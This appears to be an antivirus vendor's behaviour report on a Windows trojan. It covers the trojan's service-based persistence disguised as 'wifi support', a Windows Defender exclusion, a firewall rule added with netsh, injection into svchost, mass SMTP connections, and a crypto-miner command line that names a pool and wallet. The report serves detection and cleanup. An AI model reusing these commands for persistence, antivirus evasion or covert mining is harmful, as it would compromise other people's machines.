Trojan.Siggen15.19987

Technical Information

To ensure autorun and distribution

Sets the following service settings

[<HKLM>\System\CurrentControlSet\Services\pyhslibg] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\pyhslibg] 'ImagePath' = '<SYSTEM32>\pyhslibg\shuqcbug.exe /d"<Full path to file>"'
[<HKLM>\SYSTEM\CurrentControlSet\services\pyhslibg] 'ImagePath' = '<SYSTEM32>\pyhslibg\shuqcbug.exe'

Creates the following services

'pyhslibg' <SYSTEM32>\pyhslibg\shuqcbug.exe /d"<Full path to file>"
'pyhslibg' <SYSTEM32>\pyhslibg\shuqcbug.exe

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion with following registry keys:

[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\pyhslibg' = '00000000'

Executes the following

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="<SYSTEM32>\svchost.exe" enable=yes>nul

Injects code into

the following system processes:

<SYSTEM32>\svchost.exe

Modifies file system

Creates the following files

%TEMP%\shuqcbug.exe
<SYSTEM32>\config\systemprofile:.repos

Moves the following files

from %TEMP%\shuqcbug.exe to <SYSTEM32>\pyhslibg\shuqcbug.exe

Deletes itself.

Network activity

Connects to

'mi##########m.mail.protection.outlook.com':25
'al######x-vip2.prodigy.net':25
'go###ining.com':25
'ma####.#uchananinbox.com':25
'cl#######.eu.messagelabs.com':25
'ma##.#mt-taurus.de':25
'ma##.#-o-lane.com':25
'mx#.#mpal.com':25
'mx#.##xmalls.com':25
'w0#####2.kasserver.com':25
'sm##.#opmail.com':25
'mx#######501.gslb.pphosted.com':25
'ma####.schaeffler.com':25
'mx#.aok.de':25
'of####.##fis.uni-oldenburg.de':25
'mx#######301.gslb.pphosted.com':25
'alt1.gmail-smtp-in.l.google.com':25
'mx.##online.de':25
'ma###.mbholding.net':25
'ma##.koerber.de':25
'mx#.###ita.iphmx.com':25
'mx##.m1bp.com':25
'40.##1.50.178':993
'go###e.co.uk':443
'in#####.mycorphosting.com':25
'mx.#len.pl':25
'mx#.#ate.com':25
'sc##.c-i-s.net':25
'mx##.##rnetsecurity.com':25
'mx####.carrierzone.com':25
'mx#.####y.mail2world.com':25
'mx.###eric-isp.com':25
'ma####.dolphinmail.org':25
'mx#######e01.gslb.pphosted.com':25
'mx#.#anmail.net':25
'mx.#####rfectsetting.com':25
'cu#######-1.in.mailcontrol.com':25
'mx.###-pepers.com':25
'ma##.b-io.co':25
'20######3.pamx1.hotmail.com':25
'ma##.#rchow.co.nz':25
'so####1.sohu.com':25
'ma##.##gendlaser.com':25
'mx.####rkinglove.com':25
'ca#.##rusfree.cz':25
'ma#######xcite.roc2.bluetie.com':25
'mx.#######.com.cust.b.hostedemail.com':25
'sm##.##cureserver.net':25
'mx.###r36nyc.com':25
'sg####.fcomet.com':25
'ms##.#odeoneinc.com':25
'fo####ail.amdsb.ca':25
'mx#####.eu.retarus.com':25
'mx#.##phone.coop':25
'mx#######003.gslb.pphosted.com':25
'd1######.#ss.barracudanetworks.com':25
'mx.####o.locaweb.com.br':25
'mx.########e.prod.cloud.synchronoss.net':25
'mx#####.ppe-hosted.com':25
'sp#####ewall.atvci.net':25
'mx#######b02.gslb.pphosted.com':25
'mx#######205.gslb.pphosted.com':25
'ma##.#hpclasses.org':25
'ma##.#ailerhost.net':25
'tw#.###l-in.daimler.com':25
'cu####.cscdns.net':25
'mx#######b01.gslb.pphosted.com':25
'mx#######401.gslb.pphosted.com':25
'mx##.###us-vadesecure.net':25
'mx#.#aver.com':25
'pr#######t02.heritagecoin.com':25
'cl###.tarakos.com':25
'mx##.ionos.de':25
'em##.freenet.de':25
'ma###esia.com':25
'mx##.#-online.de':25
'mx##.schlund.de':25
'ma###.#ailinator.com':25
'ps##.###.mx1.greymail.rcimx.net':25
'pr#######t03.heritagecoin.com':25
'hu##########.mail.protection.outlook.com':25
'pa####x.above.com':25
'ma##.#axmail.net':25
'ma####.hs-kempten.de':25
'mx.##wered.name':25
'mx#.#eznam.cz':25
'ma##.#-email.net':25
'fa###ool.xyz':10060
'mx##.mail.com':25
'aspmx.l.google.com':25
'de###twax.ru':480
'de###twax.ru':443
'de#####9.your-server.de':25
'ma##.no-log.org':25
'ww####.your-server.de':25
'19#.#6.146.41':416
'19#.#6.146.42':416
'ma##.###delich-parkett.de':25
'mx##.##ndenserver.de':25
'mx##.###g.kundenserver.de':25
'st#########.mail.protection.outlook.com':25
'mx#.#teag.com':25
'mx##.#adencloud.de':25
'sm###n.rzone.de':25
'cl######.eu.messagelabs.com':25
'sm###.#sysbs.services':25
'mx####.##il.gm0.yahoodns.net':25
'pk#####.#sg.pkvw.co.charter.net':25
'mx####.#egamailservers.eu':25
'19#.#6.146.43':416
'mx.##a.untd.com':25
'du#####.sou-dubska.cz':25
'mx#####ica.zoneedit.com':25
'ma##.#rashymail.com':25
'wo##.#-poster.info':25000
'i.###tagram.com':443
'mt#.#1cn.com':25
'mt##.##0.yahoodns.net':25
'mx##.##il.icloud.com':25
'google.com':80
'fr#####.#inamail.sina.com.cn':25
'91.##9.63.95':416
'51.##8.144.223':416
'18#.#53.219.200':416
'mx.##teria.pl':25
'pi####sproducts.com':25

TCP

HTTP GET requests

http://www.google.com/

HTTP POST requests

http://wo##.###oster.info:25000/ via wo##.#-poster.info

Other

'de###twax.ru':443
'ma####.#uchananinbox.com':25
'cl#######.eu.messagelabs.com':25
'ma##.#mt-taurus.de':25
'mx#.##xmalls.com':25
'w0#####2.kasserver.com':25
'sm##.#opmail.com':25
'ma####.schaeffler.com':25
'mx##.##rnetsecurity.com':25
'mx#######301.gslb.pphosted.com':25
'of####.##fis.uni-oldenburg.de':25
'alt1.gmail-smtp-in.l.google.com':25
'ma##.koerber.de':25
'sc##.c-i-s.net':25
'mx##.m1bp.com':25
'40.##1.50.178':993
'mx#.aok.de':25
'mx####.carrierzone.com':25
'mx#.####y.mail2world.com':25
'so####1.sohu.com':25
'mx#.#anmail.net':25
'cu#######-1.in.mailcontrol.com':25
'20######3.pamx1.hotmail.com':25
'ma##.#rchow.co.nz':25
'ma##.##gendlaser.com':25
'ma##.no-log.org':25
'go###e.co.uk':443
'ma##.#-o-lane.com':25
'fo####ail.amdsb.ca':25
'ms##.#odeoneinc.com':25
'mx#####.ppe-hosted.com':25
'mx#.##phone.coop':25
'd1######.#ss.barracudanetworks.com':25
'mx.##wered.name':25
'al######x-vip2.prodigy.net':25
'mx#####.eu.retarus.com':25
'go###ining.com':25
'in###gram.com':443
'ma##.#hpclasses.org':25
'ma##.###delich-parkett.de':25
'mx#.#eznam.cz':25
'ps##.###.mx1.greymail.rcimx.net':25
'du#####.sou-dubska.cz':25
'mx#.#aver.com':25
'de#####9.your-server.de':25
'pr#######t02.heritagecoin.com':25
'ma###esia.com':25
'ma###.#ailinator.com':25
'cu####.cscdns.net':25
'hu##########.mail.protection.outlook.com':25
'ma####.hs-kempten.de':25
'pa####x.above.com':25
'ma##.#-email.net':25
'fa###ool.xyz':10060
'aspmx.l.google.com':25
'de###twax.ru':480
'pr#######t03.heritagecoin.com':25
'sp#####ewall.atvci.net':25
'18#.#53.219.200':416
'19#.#6.146.41':416
'91.##9.63.95':416
'st#########.mail.protection.outlook.com':25
'mx#.#teag.com':25
'19#.#6.146.42':416
'sm###n.rzone.de':25
'mx####.##il.gm0.yahoodns.net':25
'19#.#6.146.43':416
'fr#####.#inamail.sina.com.cn':25
'mx####.#egamailservers.eu':25
'51.##8.144.223':416
'mx#####ica.zoneedit.com':25
'i.###tagram.com':443
'ma##.#rashymail.com':25
'mt#.#1cn.com':25
'ww####.your-server.de':25
'mt##.##0.yahoodns.net':25
'mx.##teria.pl':25
'mx.###eric-isp.com':25

UDP

DNS ASK mi##########m.mail.protection.outlook.com
DNS ASK mx#.##xmalls.com
DNS ASK em##l.com
DNS ASK mx#.#mpal.com
DNS ASK ow##ic.com
DNS ASK be####chinese.com
DNS ASK b-###ane.com
DNS ASK ma##.#-o-lane.com
DNS ASK tm###aurus.de
DNS ASK ma##.#mt-taurus.de
DNS ASK am##a.com
DNS ASK cl#######.eu.messagelabs.com
DNS ASK bu####aninbox.com
DNS ASK ma####.#uchananinbox.com
DNS ASK ph##ns.com
DNS ASK go###ining.com
DNS ASK be###outh.net
DNS ASK al######x-vip2.prodigy.net
DNS ASK ex##te.com
DNS ASK ma#######xcite.roc2.bluetie.com
DNS ASK pe##oys.com
DNS ASK mx#######301.gslb.pphosted.com
DNS ASK ta##et.com
DNS ASK mx#######b02.gslb.pphosted.com
DNS ASK sp##y.se
DNS ASK mx#.####y.mail2world.com
DNS ASK ph###nix.com
DNS ASK mx#####.ppe-hosted.com
DNS ASK b.#.##stagram.com
DNS ASK ha###maninc.com
DNS ASK fo####loveofpete.us
DNS ASK op###line.net
DNS ASK w0#####2.kasserver.com
DNS ASK sm##.#opmail.com
DNS ASK mx.#len.pl
DNS ASK ko###roup.com
DNS ASK in#####.mycorphosting.com
DNS ASK go###e.co.uk
DNS ASK ve##zon.net
DNS ASK mx##.m1bp.com
DNS ASK da##ta.com
DNS ASK mx#.###ita.iphmx.com
DNS ASK co###ruim.net
DNS ASK ha##i.com
DNS ASK ma##.koerber.de
DNS ASK ma####rd-bahls.com
DNS ASK ma###.mbholding.net
DNS ASK o2##line.de
DNS ASK mx.##online.de
DNS ASK alt1.gmail-smtp-in.l.google.com
DNS ASK of##s.de
DNS ASK of####.##fis.uni-oldenburg.de
DNS ASK wi###ream.net
DNS ASK al######r-ventilfabrik.de
DNS ASK mx##.##rnetsecurity.com
DNS ASK ku##s-it.de
DNS ASK mx#.aok.de
DNS ASK sc###ffler.com
DNS ASK ma####.schaeffler.com
DNS ASK ea###link.net
DNS ASK am###trade.com
DNS ASK mx#######501.gslb.pphosted.com
DNS ASK yo##ail.com
DNS ASK vo###rfragen.de
DNS ASK mx.########e.prod.cloud.synchronoss.net
DNS ASK gl##o.com
DNS ASK mx.####o.locaweb.com.br
DNS ASK so####1.sohu.com
DNS ASK mr###w.co.nz
DNS ASK ma##.#rchow.co.nz
DNS ASK th###perpad.com
DNS ASK po##.com
DNS ASK th##dbs.com
DNS ASK 20######3.pamx1.hotmail.com
DNS ASK th####uettes.com
DNS ASK ro###mail.com
DNS ASK ma##.b-io.co
DNS ASK th###epers.com
DNS ASK mx.###-pepers.com
DNS ASK ar###hgroup.com
DNS ASK pi####sproducts.com
DNS ASK cu#######-1.in.mailcontrol.com
DNS ASK th#####ectsetting.com
DNS ASK mx.#####rfectsetting.com
DNS ASK da##.net
DNS ASK mx#.#anmail.net
DNS ASK ha##ail.net
DNS ASK re##m.com
DNS ASK mx#######e01.gslb.pphosted.com
DNS ASK do###inmail.org
DNS ASK ma####.dolphinmail.org
DNS ASK ro####eltmail.com
DNS ASK mx.###eric-isp.com
DNS ASK mu###ettv.com
DNS ASK ma###nator.com
DNS ASK ma##.##gendlaser.com
DNS ASK so##.com
DNS ASK le###dlaser.com
DNS ASK ma##.no-log.org
DNS ASK no##og.org
DNS ASK d1######.#ss.barracudanetworks.com
DNS ASK pj##p.com
DNS ASK we#####rgoadvisors.com
DNS ASK mx#######003.gslb.pphosted.com
DNS ASK ta##o.com
DNS ASK ph###coop.coop
DNS ASK mx#.##phone.coop
DNS ASK an###nyarms.com
DNS ASK an##########com.mail.protection.outlook.com
DNS ASK ku####-nagel.com
DNS ASK mx#####.eu.retarus.com
DNS ASK cd#.com
DNS ASK wf###isors.com
DNS ASK o2.pl
DNS ASK fo####ail.amdsb.ca
DNS ASK ed.#mdsb.ca
DNS ASK ms##.#odeoneinc.com
DNS ASK li###waves.com
DNS ASK sg####.fcomet.com
DNS ASK pi###6nyc.com
DNS ASK mx.###r36nyc.com
DNS ASK am###-kaye.com
DNS ASK sm##.##cureserver.net
DNS ASK no##ail.com
DNS ASK mx.#######.com.cust.b.hostedemail.com
DNS ASK at##i.net
DNS ASK sp#####ewall.atvci.net
DNS ASK am####inglove.com
DNS ASK mx.####rkinglove.com
DNS ASK lo####dfoster.com
DNS ASK co###neinc.com
DNS ASK th###cks.org
DNS ASK mx#.#ate.com
DNS ASK wa#####ch-parkett.de
DNS ASK we###nburg.de
DNS ASK mx##.schlund.de
DNS ASK t-##line.de
DNS ASK mx##.#-online.de
DNS ASK ma###esia.com
DNS ASK fr##net.de
DNS ASK em##.freenet.de
DNS ASK ze###lan.org
DNS ASK mx##.ionos.de
DNS ASK ta##kos.com
DNS ASK cl###.tarakos.com
DNS ASK he#####eauctions.com
DNS ASK pr#######t02.heritagecoin.com
DNS ASK he####gecoin.com
DNS ASK na##r.com
DNS ASK mx#.#aver.com
DNS ASK he#####egalleries.com
DNS ASK mi###pring.com
DNS ASK mx##.###us-vadesecure.net
DNS ASK te###orm.com
DNS ASK ho##ial.com
DNS ASK be##ee.com
DNS ASK mx#######401.gslb.pphosted.com
DNS ASK va##ro.com
DNS ASK mx#######b01.gslb.pphosted.com
DNS ASK so###ubska.cz
DNS ASK du#####.sou-dubska.cz
DNS ASK or##ge.net
DNS ASK cu####.cscdns.net
DNS ASK de#####9.your-server.de
DNS ASK ps##.net
DNS ASK vo####aushaar.com
DNS ASK da##ler.com
DNS ASK de###twax.ru
DNS ASK my##c.net
DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
DNS ASK aspmx.l.google.com
DNS ASK ma##.com
DNS ASK 19#.###.#11.95.bl.spamcop.net
DNS ASK mx##.mail.com
DNS ASK 19#.###.211.95.in-addr.arpa
DNS ASK 19#.###.#11.95.zen.spamhaus.org
DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
DNS ASK 19#.###.#11.95.cbl.abuseat.org
DNS ASK ti##jo.com
DNS ASK fa###ool.xyz
DNS ASK ma##.#-email.net
DNS ASK se##am.cz
DNS ASK mx#.#eznam.cz
DNS ASK tr##m.com
DNS ASK mx.##wered.name
DNS ASK hs###mpten.de
DNS ASK ma####.hs-kempten.de
DNS ASK gm##.com
DNS ASK ma##.#axmail.net
DNS ASK ho##ai.fr
DNS ASK dr##b.net
DNS ASK pa####x.above.com
DNS ASK hu###man.com
DNS ASK hu##########.mail.protection.outlook.com
DNS ASK ha.com
DNS ASK pr#######t03.heritagecoin.com
DNS ASK tw#.###l-in.daimler.com
DNS ASK ps##.###.mx1.greymail.rcimx.net
DNS ASK vo#######rbeitssicherheit.de
DNS ASK ww####.your-server.de
DNS ASK wa####-germany.com
DNS ASK sm###n.rzone.de
DNS ASK mo###flug.com
DNS ASK mx##.#adencloud.de
DNS ASK st##g.com
DNS ASK mx#.#teag.com
DNS ASK gm##l.com
DNS ASK wa###rpoint.de
DNS ASK st##ker.com
DNS ASK st#########.mail.protection.outlook.com
DNS ASK on##ne.de
DNS ASK mx##.###g.kundenserver.de
DNS ASK wa###urg.com
DNS ASK sc##.c-i-s.net
DNS ASK mx##.##ndenserver.de
DNS ASK ma##.###delich-parkett.de
DNS ASK dy##.com
DNS ASK ma##.#ailerhost.net
DNS ASK ph###asses.org
DNS ASK ma##.#hpclasses.org
DNS ASK ug###ock.com
DNS ASK al##anz.de
DNS ASK in###gram.com
DNS ASK mx#######205.gslb.pphosted.com
DNS ASK ea###ling.net
DNS ASK vo##y.cz
DNS ASK ca#.##rusfree.cz
DNS ASK fr##a.com
DNS ASK bo####-profil.com
DNS ASK cl######.eu.messagelabs.com
DNS ASK sm###.#sysbs.services
DNS ASK rh###metall.com
DNS ASK mx####.##il.gm0.yahoodns.net
DNS ASK fr#####.#inamail.sina.com.cn
DNS ASK google.com
DNS ASK ic##ud.com
DNS ASK mx##.##il.icloud.com
DNS ASK ro###tmail.com
DNS ASK mt##.##0.yahoodns.net
DNS ASK 21##.com
DNS ASK mt#.#1cn.com
DNS ASK ep####emailmobil.de
DNS ASK i.###tagram.com
DNS ASK tr###ymail.com
DNS ASK ma##.#rashymail.com
DNS ASK wo##.#-poster.info
DNS ASK na##.com
DNS ASK mx#####ica.zoneedit.com
DNS ASK do##eit.com
DNS ASK mx####.carrierzone.com
DNS ASK em##l.cz
DNS ASK in##ria.pl
DNS ASK mx.##teria.pl
DNS ASK ju##.com
DNS ASK mx.##a.untd.com
DNS ASK al##e.de
DNS ASK mx####.#egamailservers.eu
DNS ASK ro###unner.com
DNS ASK pk#####.#sg.pkvw.co.charter.net
DNS ASK an##omy.com
DNS ASK ak###online.de
DNS ASK ne###ape.net
DNS ASK si##.com
DNS ASK my###rpoint.net
DNS ASK ma###.#ailinator.com

Miscellaneous

Creates and executes the following

'<SYSTEM32>\pyhslibg\shuqcbug.exe' /d"<Full path to file>"
'<SYSTEM32>\cmd.exe' /C mkdir <SYSTEM32>\pyhslibg\' (with hidden window)
'<SYSTEM32>\cmd.exe' /C move /Y "%TEMP%\shuqcbug.exe" <SYSTEM32>\pyhslibg\' (with hidden window)
'<SYSTEM32>\sc.exe' create pyhslibg binPath= "<SYSTEM32>\pyhslibg\shuqcbug.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
'<SYSTEM32>\sc.exe' description pyhslibg "wifi internet conection"' (with hidden window)
'<SYSTEM32>\sc.exe' start pyhslibg' (with hidden window)
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="<SYSTEM32>\svchost.exe" enable=yes>nul' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /C mkdir <SYSTEM32>\pyhslibg\
'<SYSTEM32>\cmd.exe' /C move /Y "%TEMP%\shuqcbug.exe" <SYSTEM32>\pyhslibg\
'<SYSTEM32>\sc.exe' create pyhslibg binPath= "<SYSTEM32>\pyhslibg\shuqcbug.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
'<SYSTEM32>\sc.exe' description pyhslibg "wifi internet conection"
'<SYSTEM32>\sc.exe' start pyhslibg
'<SYSTEM32>\svchost.exe'
'<SYSTEM32>\svchost.exe' -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half

Technologies

Begriffe

Schulung und Training

Mythen

Technical Information

Curing recommendations

Free trial